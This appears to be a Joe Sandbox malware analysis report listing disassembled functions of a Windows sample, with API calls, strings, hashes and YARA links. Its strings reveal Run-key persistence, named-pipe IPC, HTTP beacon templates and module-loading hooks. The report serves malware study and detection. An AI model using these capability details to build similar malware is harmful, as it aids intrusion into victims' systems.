                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWidememset$lstrcmpstrstrwcsstr
                                                                  • String ID: %s.%S$bdns$block$brk$rdns
                                                                  • API String ID: 695720605-4000218262
                                                                  • Opcode ID: dfbd5013c6e539dd824b9a24c3959a34b3ff201e6a0d4fdfe36343a184e631af
                                                                  • Instruction ID: e22beee7b04eca816cb5d4be7fb2c114da0d153143c6c6f3712bc8c3e9587b53
                                                                  • Opcode Fuzzy Hash: dfbd5013c6e539dd824b9a24c3959a34b3ff201e6a0d4fdfe36343a184e631af
                                                                  • Instruction Fuzzy Hash: 75510776A00204BBEB33DB58DC46FEB37AC9B46700F04C159F908A6185E7B4DA44CBE2
                                                                  Function 004010A0 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 102stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 004010C0
                                                                  • lstrcmpW.KERNEL32(?,0044ADA0), ref: 004010D7
                                                                  • lstrcmpW.KERNEL32(?,0044A710), ref: 0040111D
                                                                  • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 00401127
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000104,00000000,00000000), ref: 00401161
                                                                  • lstrcpyA.KERNEL32(00416D88,00000000), ref: 00401179
                                                                  • lstrcpyA.KERNEL32(00000000,00411335), ref: 00401187
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000104,00000000,00000000), ref: 004011A0
                                                                  • lstrcpyA.KERNEL32(00416E90,00000000), ref: 004011B3
                                                                    • Part of subcall function 00407700: memset.MSVCRT ref: 0040771E
                                                                    • Part of subcall function 00407700: _snprintf.MSVCRT ref: 00407738
                                                                    • Part of subcall function 00407700: lstrlenA.KERNEL32(00000000), ref: 00407747
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcpy$ByteCharMultiWidelstrcmpmemset$FileMove_snprintflstrlen
                                                                  • String ID: %s.%S$pdef$ruskill
                                                                  • API String ID: 1230166232-1410347113
                                                                  • Opcode ID: 51cd4f5fa0b6c86073725b4143443cb2e09f91004ad57c90408242329a01e057
                                                                  • Instruction ID: 68c4e51678c4734124622e75f1a3a1355b75001ea3a3ec5cf96f04565ba1ff23
                                                                  • Opcode Fuzzy Hash: 51cd4f5fa0b6c86073725b4143443cb2e09f91004ad57c90408242329a01e057
                                                                  • Instruction Fuzzy Hash: 6C3106B17403187BE7209B559C82FEB736C9B89B10F104167FB54B62D0D6F4ED80866D
                                                                  Function 003610A0 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 102stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 003610C0
                                                                  • lstrcmpW.KERNEL32(?,003AADA0), ref: 003610D7
                                                                  • lstrcmpW.KERNEL32(?,003AA710), ref: 0036111D
                                                                  • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 00361127
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000104,00000000,00000000), ref: 00361161
                                                                  • lstrcpyA.KERNEL32(00376D88,00000000), ref: 00361179
                                                                  • lstrcpyA.KERNEL32(00000000,00371335), ref: 00361187
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000104,00000000,00000000), ref: 003611A0
                                                                  • lstrcpyA.KERNEL32(00376E90,00000000), ref: 003611B3
                                                                    • Part of subcall function 00367700: memset.MSVCRT ref: 0036771E
                                                                    • Part of subcall function 00367700: _snprintf.MSVCRT ref: 00367738
                                                                    • Part of subcall function 00367700: lstrlenA.KERNEL32(00000000), ref: 00367747
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcpy$ByteCharMultiWidelstrcmpmemset$FileMove_snprintflstrlen
                                                                  • String ID: %s.%S$pdef$ruskill
                                                                  • API String ID: 1230166232-1410347113
                                                                  • Opcode ID: 026796b3398e48b2c7459e421fa4b673d99b30e0795f54399508c3a6eccdecdb
                                                                  • Instruction ID: 9d6444960be679eb6122ead5cea05bd00bc0396b9c6d29d9cc57b329a63771c6
                                                                  • Opcode Fuzzy Hash: 026796b3398e48b2c7459e421fa4b673d99b30e0795f54399508c3a6eccdecdb
                                                                  • Instruction Fuzzy Hash: 7931B6B67403157BE7329B589C86FEA736CDB4AB10F048155FB48AA1C4D7F0AD80C675
                                                                  Function 004073E0 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 97stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: _vsnprintflstrlenmemset$_memicmp_snprintf
                                                                  • String ID: %s.%s$%s_$blk$block
                                                                  • API String ID: 3657324510-3589362310
                                                                  • Opcode ID: 9ce3c90b2ddbd0b13b32ba395e9eecb039a435e54ac3256a86e0091f5d7442f1
                                                                  • Instruction ID: e3d0b4f69a4c5134c0a3218338a603e019a2a9bfe2e8293b1a871985f276413f
                                                                  • Opcode Fuzzy Hash: 9ce3c90b2ddbd0b13b32ba395e9eecb039a435e54ac3256a86e0091f5d7442f1
                                                                  • Instruction Fuzzy Hash: EE2132B294031D7AE710EB59DC82FFB336CDB44708F4445BEBB0893182E5789E854769
                                                                  Function 003673E0 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 97stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: _vsnprintflstrlenmemset$_memicmp_snprintf
                                                                  • String ID: %s.%s$%s_$blk$block
                                                                  • API String ID: 3657324510-3589362310
                                                                  • Opcode ID: 8ec815edb3d7ef0f5650a5b99d74dfb188bacf20701c102f680c0e481b745799
                                                                  • Instruction ID: 78c4405644adff30dfdb7592f11d1775d1ca0444fa21cc2ba795f0e9b637c2f6
                                                                  • Opcode Fuzzy Hash: 8ec815edb3d7ef0f5650a5b99d74dfb188bacf20701c102f680c0e481b745799
                                                                  • Instruction Fuzzy Hash: F0213FB694020D7AE722EA59DC82FFB33ACDB44714F44C5A8FA0CA7141EA749E4547A0
                                                                  Function 00409580 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 89stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: memset$lstrcpy$CountTicksprintfstrtok
                                                                  • String ID: %s / ?%d HTTP/1.1Host: %sUser-Agent: %sKeep-Alive: 300Connection: keep-aliveContent-Length: 42$GET$Mozilla/4.0$POST
                                                                  • API String ID: 3318893083-109246470
                                                                  • Opcode ID: ab8c1bc6b042fd2f554f543c151083597909fae3e40bddd3ea1445c51ee56114
                                                                  • Instruction ID: a58238f94dc203fc7a4291ccda806a9fd0a954f169f11a3db57d908f1604fe94
                                                                  • Opcode Fuzzy Hash: ab8c1bc6b042fd2f554f543c151083597909fae3e40bddd3ea1445c51ee56114
                                                                  • Instruction Fuzzy Hash: 06212DF29402186AC714E769CD42FDA736C9BA8704F00459BF308B21C1D6F8AFC48A6C
                                                                  Function 00369580 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 89stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: memset$lstrcpy$CountTicksprintfstrtok
                                                                  • String ID: %s / ?%d HTTP/1.1Host: %sUser-Agent: %sKeep-Alive: 300Connection: keep-aliveContent-Length: 42$GET$Mozilla/4.0$POST
                                                                  • API String ID: 3318893083-109246470
                                                                  • Opcode ID: b08fe21d9414c3fcabf9b8713482819aac44f78b313de411a617f3f36387d9ac
                                                                  • Instruction ID: 46f88dac0910a650fb4a8c36ef33eec2eac0c80e771e804df30f6ccca82bcf18
                                                                  • Opcode Fuzzy Hash: b08fe21d9414c3fcabf9b8713482819aac44f78b313de411a617f3f36387d9ac
                                                                  • Instruction Fuzzy Hash: 58212EB69402186AD73BD764CC86FEA736C9FA9710F04C585F30DA6085D6F4ABC48B61
                                                                  Function 00408270 Relevance: 19.8, APIs: 13, Instructions: 305COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 00408292
                                                                  • GetTickCount.KERNEL32 ref: 004082A8
                                                                    • Part of subcall function 004081C0: WSAStartup.WS2_32(00000202,?), ref: 004081E3
                                                                  • select.WS2_32(00000000,00000000,?,00000000,?), ref: 00408314
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CountTick$Startupselect
                                                                  • String ID:
                                                                  • API String ID: 3882035529-0
                                                                  • Opcode ID: 85fd59747fc3b1c661cce8175a3d351750ef0b52ceea1d2a7c6e5893856a6c4a
                                                                  • Instruction ID: 4b61705fb868fa9baa08715d210e5fb779858df6dc90d303a1a16509d1b594dd
                                                                  • Opcode Fuzzy Hash: 85fd59747fc3b1c661cce8175a3d351750ef0b52ceea1d2a7c6e5893856a6c4a
                                                                  • Instruction Fuzzy Hash: 62A1DBB1900604ABC734DF69D981AEBB7E8EF44314F00492FE68D97281E779A9818B95
                                                                  Function 00368270 Relevance: 19.8, APIs: 13, Instructions: 305COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 00368292
                                                                  • GetTickCount.KERNEL32 ref: 003682A8
                                                                    • Part of subcall function 003681C0: WSAStartup.WS2_32(00000202,?), ref: 003681E3
                                                                  • select.WS2_32(00000000,00000000,?,00000000,?), ref: 00368314
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CountTick$Startupselect
                                                                  • String ID:
                                                                  • API String ID: 3882035529-0
                                                                  • Opcode ID: 67d605d7d4f21b641fd4e26498f51e5d61285701a36c3e7f5d9f37b875a8d93e
                                                                  • Instruction ID: 6bd779b523b20719365a77ca8c76f6c65e202ba8e446b0596368e3e5b2702e20
                                                                  • Opcode Fuzzy Hash: 67d605d7d4f21b641fd4e26498f51e5d61285701a36c3e7f5d9f37b875a8d93e
                                                                  • Instruction Fuzzy Hash: B7A1F9B1900604ABC735DF68D881AEBB3F8EF49314F00C61DF68EC7645DB75A9858BA1
                                                                  Function 00406F70 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 125stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 00406F91
                                                                  • lstrcpyA.KERNEL32(00000000,HKCU\), ref: 00406FFE
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000400), ref: 00407017
                                                                  • _wcsnicmp.MSVCRT ref: 00407061
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide_wcsnicmplstrcpymemset
                                                                  • String ID: %S%s%s$%s.%s%s$HKCU\$HKLM\$Software\Microsoft\Windows\CurrentVersion\Run$brk$rreg
                                                                  • API String ID: 2911520168-3007424447
                                                                  • Opcode ID: 24fe703b4de6350d17fbfb4750cd8bb4c3951149c9ffddb89d5d1c17b520efb2
                                                                  • Instruction ID: 52cdffd3aed9817ff0f5470690bd97fa8b38541f7e8b3e480f67bf3efe9e444e
                                                                  • Opcode Fuzzy Hash: 24fe703b4de6350d17fbfb4750cd8bb4c3951149c9ffddb89d5d1c17b520efb2
                                                                  • Instruction Fuzzy Hash: D241A5B1B54218BBDB10CF95DC42FEF77ACAB58714F10412BFA04F2281E678A9508769
                                                                  Function 00366F70 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 125stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 00366F91
                                                                  • lstrcpyA.KERNEL32(00000000,HKCU\), ref: 00366FFE
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000400), ref: 00367017
                                                                  • _wcsnicmp.MSVCRT ref: 00367061
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide_wcsnicmplstrcpymemset
                                                                  • String ID: %S%s%s$%s.%s%s$HKCU\$HKLM\$Software\Microsoft\Windows\CurrentVersion\Run$brk$rreg
                                                                  • API String ID: 2911520168-3007424447
                                                                  • Opcode ID: 0d45d3b2ba07d0a4a0618b33501e6458a9cbacb258cddf956ad6d2cd269dfc33
                                                                  • Instruction ID: 56029d94d50216742f54f4b340fdfa432c3bc340f62fbbf4362b17196c786093
                                                                  • Opcode Fuzzy Hash: 0d45d3b2ba07d0a4a0618b33501e6458a9cbacb258cddf956ad6d2cd269dfc33
                                                                  • Instruction Fuzzy Hash: 3D41C4B2A50208BBDB22CB94DC42EFE77BCEB59714F048119FA08E7285E674994087B5
                                                                  Function 0040E880 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 84pipestringthreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0040E8A0
                                                                  • lstrlenA.KERNEL32(30e44aa1), ref: 0040E8AD
                                                                  • _snprintf.MSVCRT ref: 0040E8D0
                                                                  • CreateNamedPipeA.KERNEL32(00000000,00000003,00000006,000000FF,00000800,00000800,00001388,00000000), ref: 0040E8FF
                                                                  • ConnectNamedPipe.KERNEL32(00000000,00000000), ref: 0040E913
                                                                  • GetLastError.KERNEL32 ref: 0040E91D
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000D7A0,00000000,00000000,00000000), ref: 0040E941
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040E94B
                                                                  • CreateNamedPipeA.KERNEL32(00000000,00000003,00000006,000000FF,00000800,00000800,00001388,00000000), ref: 0040E96E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CreateNamedPipe$CloseConnectErrorHandleLastThread_snprintflstrlenmemset
                                                                  • String ID: 30e44aa1$\\.\pipe\%08x_ipc
                                                                  • API String ID: 4065143564-1096776489
                                                                  • Opcode ID: e693463ca9314ef0d474e7815daa56aeeb6a66ebd1abb46cdd44f1c84a99d209
                                                                  • Instruction ID: 85e23c8102626b95d66f369786d20e7ea1e1dc74d471df5540707f019a3fc3e2
                                                                  • Opcode Fuzzy Hash: e693463ca9314ef0d474e7815daa56aeeb6a66ebd1abb46cdd44f1c84a99d209
                                                                  • Instruction Fuzzy Hash: 172135B1BC03147AF33063658C47FEA7618AB54F10F248676FB04FA0D0DAF4694446AC
                                                                  Function 00405A20 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 189threadlibraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LdrEnumerateLoadedModules.NTDLL(00000000,00405040,g\@), ref: 00405B0D
                                                                  • CreateThread.KERNEL32(00000000,00000000,00405070,00000000,00000000,00000000), ref: 00405C03
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00405C0A
                                                                  • CreateThread.KERNEL32(00000000,00000000,004050F0,00000000,00000000,00000000), ref: 00405C3D
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00405C44
                                                                    • Part of subcall function 00403920: RtlAnsiStringToUnicodeString.NTDLL(?,?,00000000), ref: 00403962
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateHandleStringThread$AnsiEnumerateLoadedModulesUnicode
                                                                  • String ID: LdrLoadDll$NtResumeThread$g\@$g\@$ntdll.dll
                                                                  • API String ID: 1691487058-1858031983
                                                                  • Opcode ID: 15177fe99cea3c95e7436bba47e17e1593aa2991ecdead64e05b4e770913e227
                                                                  • Instruction ID: d2a4e14280715d1041b6f2962eb7ad267d111edd4e47b72a6ec2395f63253a1b
                                                                  • Opcode Fuzzy Hash: 15177fe99cea3c95e7436bba47e17e1593aa2991ecdead64e05b4e770913e227
                                                                  • Instruction Fuzzy Hash: A1619DB5740B02ABDB24DF69CC81F6B73A4EB44704F14453AE941AB7D1D678F9018E98
                                                                  Function 00407100 Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 102stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: _wcsnicmplstrcpymemset
                                                                  • String ID: %S%S%S$%s.%S%S$HKCU\$HKLM\$Software\Microsoft\Windows\CurrentVersion\Run$brk$rreg
                                                                  • API String ID: 1531173107-4065158899
                                                                  • Opcode ID: 15fef406b5b0ac02f8dd93d8979f457128f2eb8a91285582a43150cae03d9c6d
                                                                  • Instruction ID: 0d62909f67cd26c4267f5d97f7bb411455192b825f2191604f2d867da3f0bcac
                                                                  • Opcode Fuzzy Hash: 15fef406b5b0ac02f8dd93d8979f457128f2eb8a91285582a43150cae03d9c6d
                                                                  • Instruction Fuzzy Hash: D5310B71E853147AD710DF849C46FEB336CDF98745F10416BFD04B2282E578B99086AE
                                                                  Function 00367100 Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 102stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: _wcsnicmplstrcpymemset
                                                                  • String ID: %S%S%S$%s.%S%S$HKCU\$HKLM\$Software\Microsoft\Windows\CurrentVersion\Run$brk$rreg
                                                                  • API String ID: 1531173107-4065158899
                                                                  • Opcode ID: e3e7edb0a543890e5ba46add6a6594e831ef531ac7ee9f9ae8093df41f508619
                                                                  • Instruction ID: e92308c8f6088221fd27f308028b5a557b0fb31541fa595c3dbeb87617dc812f
                                                                  • Opcode Fuzzy Hash: e3e7edb0a543890e5ba46add6a6594e831ef531ac7ee9f9ae8093df41f508619
                                                                  • Instruction Fuzzy Hash: 72312477A50218BADB22DE48DC86EFB33ACEB58714F008505FD08A2246E6B4AD5087F5
                                                                  Function 00406940 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 72stringfileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 004019F0: wcsrchr.MSVCRT ref: 004019F9
                                                                    • Part of subcall function 00407700: memset.MSVCRT ref: 0040771E
                                                                    • Part of subcall function 00407700: _snprintf.MSVCRT ref: 00407738
                                                                    • Part of subcall function 00407700: lstrlenA.KERNEL32(00000000), ref: 00407747
                                                                  • strstr.MSVCRT ref: 004069A8
                                                                  • lstrcmpA.KERNEL32(00416D88,0044AC50,?,?,?,?,?,?), ref: 004069BE
                                                                  • SetFileAttributesA.KERNEL32(00416E90,00000080,?,?,?,?,?,?), ref: 004069D2
                                                                  • DeleteFileA.KERNEL32(00416E90,?,?,?,?,?,?), ref: 004069DD
                                                                  • MoveFileExA.KERNEL32 ref: 004069EC
                                                                    • Part of subcall function 0040A310: memset.MSVCRT ref: 0040A335
                                                                    • Part of subcall function 0040A310: memset.MSVCRT ref: 0040A34F
                                                                    • Part of subcall function 0040A310: memset.MSVCRT ref: 0040A369
                                                                    • Part of subcall function 0040A310: _vsnprintf.MSVCRT ref: 0040A382
                                                                    • Part of subcall function 0040A310: sprintf.MSVCRT ref: 0040A39A
                                                                    • Part of subcall function 0040A310: lstrlenA.KERNEL32(30e44aa1,?,?,00000000,000003FF,?,00000000,756F59EB,?,004074EB,%s.%s,blk,?,?,000001FE,00410A8E), ref: 0040A3AD
                                                                    • Part of subcall function 0040A310: _snprintf.MSVCRT ref: 0040A3CC
                                                                    • Part of subcall function 0040A310: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000,756F59EB,?,004074EB), ref: 0040A3DB
                                                                    • Part of subcall function 0040A310: sprintf.MSVCRT ref: 0040A3EC
                                                                    • Part of subcall function 0040A310: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000), ref: 0040A3FB
                                                                    • Part of subcall function 0040A310: lstrlenA.KERNEL32(30e44aa1,?,?,?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000), ref: 0040A404
                                                                    • Part of subcall function 0040A310: EnterCriticalSection.KERNEL32(0044AC34,?,?,00000000), ref: 0040A436
                                                                    • Part of subcall function 0040A310: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000003,00000000,00000000), ref: 0040A452
                                                                    • Part of subcall function 0040A310: LeaveCriticalSection.KERNEL32(0044AC34,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A464
                                                                  Strings
                                                                  • %s.Blocked "%S" from creating "%S", xrefs: 00406A24
                                                                  • %s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!, xrefs: 00406A06
                                                                  • autorun.inf, xrefs: 00406970
                                                                  • pdef, xrefs: 00406986
                                                                  • .exe, xrefs: 0040699C
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$Filememset$CriticalSection_snprintfsprintf$AttributesCreateDeleteEnterLeaveMove_vsnprintflstrcmpstrstrwcsrchr
                                                                  • String ID: %s.Blocked "%S" from creating "%S"$%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!$.exe$autorun.inf$pdef
                                                                  • API String ID: 2285763329-814828592
                                                                  • Opcode ID: 205a7d89b2524849cebba101b25715d3832c541841bc0d4d6ca336ccb213c6d9
                                                                  • Instruction ID: 767322c83212b5698aabde80e4d44f6b16f99ddbb09b22e2f03322de5ae40dfa
                                                                  • Opcode Fuzzy Hash: 205a7d89b2524849cebba101b25715d3832c541841bc0d4d6ca336ccb213c6d9
                                                                  • Instruction Fuzzy Hash: 19118979BC031033DA1037597C47FCB36494B51B56F164037FA15F12D2D9ADD8A085AE
                                                                  Function 00366940 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 72stringfileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 003619F0: wcsrchr.MSVCRT ref: 003619F9
                                                                    • Part of subcall function 00367700: memset.MSVCRT ref: 0036771E
                                                                    • Part of subcall function 00367700: _snprintf.MSVCRT ref: 00367738
                                                                    • Part of subcall function 00367700: lstrlenA.KERNEL32(00000000), ref: 00367747
                                                                  • strstr.MSVCRT ref: 003669A8
                                                                  • lstrcmpA.KERNEL32(00376D88,003AAC50,?,?,?,?,?,?), ref: 003669BE
                                                                  • SetFileAttributesA.KERNEL32(00376E90,00000080,?,?,?,?,?,?), ref: 003669D2
                                                                  • DeleteFileA.KERNEL32(00376E90,?,?,?,?,?,?), ref: 003669DD
                                                                  • MoveFileExA.KERNEL32 ref: 003669EC
                                                                    • Part of subcall function 0036A310: memset.MSVCRT ref: 0036A335
                                                                    • Part of subcall function 0036A310: memset.MSVCRT ref: 0036A34F
                                                                    • Part of subcall function 0036A310: memset.MSVCRT ref: 0036A369
                                                                    • Part of subcall function 0036A310: _vsnprintf.MSVCRT ref: 0036A382
                                                                    • Part of subcall function 0036A310: sprintf.MSVCRT ref: 0036A39A
                                                                    • Part of subcall function 0036A310: lstrlenA.KERNEL32(30e44aa1,?,?,00000000,000003FF,?,00000000,756F59EB,?,003674EB,%s.%s,blk,?,?,000001FE,00370A8E), ref: 0036A3AD
                                                                    • Part of subcall function 0036A310: _snprintf.MSVCRT ref: 0036A3CC
                                                                    • Part of subcall function 0036A310: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000,756F59EB,?,003674EB), ref: 0036A3DB
                                                                    • Part of subcall function 0036A310: sprintf.MSVCRT ref: 0036A3EC
                                                                    • Part of subcall function 0036A310: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000), ref: 0036A3FB
                                                                    • Part of subcall function 0036A310: lstrlenA.KERNEL32(30e44aa1,?,?,?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000), ref: 0036A404
                                                                    • Part of subcall function 0036A310: EnterCriticalSection.KERNEL32(003AAC34,?,?,00000000), ref: 0036A436
                                                                    • Part of subcall function 0036A310: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000003,00000000,00000000), ref: 0036A452
                                                                    • Part of subcall function 0036A310: LeaveCriticalSection.KERNEL32(003AAC34,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0036A464
                                                                  Strings
                                                                  • %s.Blocked "%S" from creating "%S", xrefs: 00366A24
                                                                  • %s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!, xrefs: 00366A06
                                                                  • autorun.inf, xrefs: 00366970
                                                                  • pdef, xrefs: 00366986
                                                                  • .exe, xrefs: 0036699C
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$Filememset$CriticalSection_snprintfsprintf$AttributesCreateDeleteEnterLeaveMove_vsnprintflstrcmpstrstrwcsrchr
                                                                  • String ID: %s.Blocked "%S" from creating "%S"$%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!$.exe$autorun.inf$pdef
                                                                  • API String ID: 2285763329-814828592
                                                                  • Opcode ID: aa8d3641da415f0101304a2d31fc716aea53b89728405501a1d19bc39424ca93
                                                                  • Instruction ID: da8857a622cbcf7fee80e27095a0a43edca682f8b72e98adcbbd609f166c71e1
                                                                  • Opcode Fuzzy Hash: aa8d3641da415f0101304a2d31fc716aea53b89728405501a1d19bc39424ca93
                                                                  • Instruction Fuzzy Hash: 161194BB7C070032DA3326D9AC47FEF36494B91B96F09C024FD0CF519ADA95981085B2
                                                                  Function 00403C90 Relevance: 16.7, APIs: 11, Instructions: 227filepipeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WaitForMultipleObjects.KERNEL32 ref: 00403DA4
                                                                  • ReadFile.KERNEL32(?,-00417960,00000800,00000000), ref: 00403DFF
                                                                  • GetOverlappedResult.KERNEL32(?,?,?,00000000,?,?,?,00000000,000000FF,?,?,00000000,000000FF,?,?), ref: 00403E3E
                                                                  • ReadFile.KERNEL32(?,00417960,00000800,00000000,?), ref: 00403ED7
